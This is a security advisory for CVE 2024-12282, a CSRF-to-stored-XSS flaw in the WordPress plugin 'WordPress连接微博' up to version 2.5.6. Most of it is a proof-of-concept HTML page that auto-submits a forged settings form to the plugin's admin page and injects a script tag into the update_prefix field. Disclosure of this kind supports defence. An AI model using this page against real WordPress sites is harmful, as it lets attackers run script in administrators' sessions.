WordPress连接微博 <= 2.5.6 – Stored XSS via CSRF | CVE 2024-12282

Description

The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.

Proof of Concept

Make a logged in admin open an HTML file containing:

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=wp-connect" method="post">
      <input type="hidden" name="_wpnonce" value="lalalalala" />
      <input type="hidden" name="_wp_http_referer" value="/wp-admin/options-general.php?page=wp-connect" />
      
      <label for="sync_option">Sync Option: </label>
      <input type="text" name="sync_option" id="sync_option" value="5" /><br/>

      <label for="format">Format: </label>
      <input type="text" name="format" id="format" value="5" /><br/>

      <label for="denglu_bind">Denglu Bind: </label>
      <input type="checkbox" name="denglu_bind" id="denglu_bind" value="1" checked /><br/>

      <label for="new_prefix">New Prefix: </label>
      <input type="text" name="new_prefix" id="new_prefix" value="5" /><br/>

      <label for="update_prefix">Update Prefix: </label>
      <input type="text" name="update_prefix" id="update_prefix" value='"><script>alert(999)</script>' /><br/>

      <label for="update_days">Update Days: </label>
      <input type="number" name="update_days" id="update_days" value="900" /><br/>

      <label for="cat_ids">Category IDs: </label>
      <input type="text" name="cat_ids" id="cat_ids" value="hacked" /><br/>

      <label for="post_types">Post Types: </label>
      <input type="text" name="post_types" id="post_types" value="23" /><br/>

      <label for="page_password">Page Password: </label>
      <input type="text" name="page_password" id="page_password" value="5" /><br/>

      <label for="t_cn">T CN: </label>
      <input type="text" name="t_cn" id="t_cn" value="" /><br/>

      <label for="char">Character: </label>
      <input type="text" name="char" id="char" value="-1" /><br/>

      <label for="minutes">Minutes: </label>
      <input type="text" name="minutes" id="minutes" value="" /><br/>

      <input type="submit" name="update_options" value="Save Changes" />
  </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>